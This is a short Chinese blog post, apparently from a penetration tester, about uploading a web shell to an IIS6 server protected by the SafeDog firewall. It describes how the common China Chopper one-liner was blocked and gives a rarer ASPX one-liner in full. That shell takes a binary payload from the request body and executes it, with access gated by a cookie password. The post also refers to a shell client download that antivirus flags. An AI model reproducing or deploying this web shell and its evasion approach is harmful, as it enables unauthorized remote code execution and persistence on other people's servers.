在看一个站的时候，发现服务器装了安全狗，刚开始利用IIS6的畸形解析一直被拦截，最后找到了不用畸形解析的办法，传了菜刀的一句话，却连不上，一直返回403，应该是被拦截，后来找了个相对比较生僻的一句话，终于上传并连接成功。

服务端一句话木马：

<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>

客户端截图：

 

下载：停止下载<病毒报警>